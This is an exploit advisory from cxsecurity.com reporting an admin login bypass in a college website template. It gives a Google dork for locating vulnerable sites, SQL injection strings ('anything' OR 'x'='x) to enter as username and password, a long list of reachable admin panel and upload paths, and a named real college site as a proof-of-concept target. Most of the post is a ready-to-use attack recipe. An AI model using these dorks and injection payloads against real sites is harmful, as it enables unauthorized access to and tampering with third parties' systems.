Design By Dr. Hardik Desai Developed By Chirag Lad India Admin Login Bypass Vulnerability

2018.06.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-592

################################################################################################# # Exploit Title : Design By Dr. Hardik Desai Developed By Chirag Lad India Admin Login Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 30/06/2018 # Vendor Homepage : chiraglad.in # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] ################################################################################################# # Google Dork : intext:''Design By Dr. Hardik Desai | Developed By Chirag Lad'' # Administration Control Panel Path => /admin/ # Exploit : Both are correct login credentials [ '=''or' ] or [ anything' OR 'x'='x ] Username : anything' OR 'x'='x Password : anything' OR 'x'='x Useable Administration Control Panel URL Links => /admin/dashboard.php /admin/about_index.php /admin/about_edit.php /admin/trustees_index.php /admin/trustees_edit.php /admin/facilities_index.php /admin/facilities_edit.php /admin/college_index.php /admin/college_edit.php /admin/course_edit.php /admin/course_index.php /admin/coursecontent_index.php /admin/coursecontent_create.php /admin/faculty_index.php /admin/faculty_edit.php /admin/comittees_index.php /admin/comittees_create.php /admin/activitymenu_index.php /admin/activitymaster_index.php /admin/activitymaster_edit.php /admin/activitysub_index.php /admin/activitysub_edit.php /admin/activityrecords_index.php /admin/activityrecords_edit.php /admin/awardscategory_index.php /admin/awards_index.php /admin/awards_edit.php /admin/placementmenu_index.php /admin/placementmenu_edit.php /admin/placement_index.php /admin/placement_create.php /admin/contact_details.php /admin/alumni_details.php /admin/news_index.php /admin/news_create.php /admin/staff_index.php /admin/staff_create.php /admin/change_password.php Uploaded Files Path through Admin Panel => /admin/uploaded_files/[RANDOM-NUMBERS-ALPAHETS-yourfilename.png] .jpg .gif .pdf .html .htm shtml.jpg ################################################################################################# # Example Site => naranlalacollege.in => [ Proof of Concept for the Vulnerability ] => archive.is/4mYlj ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top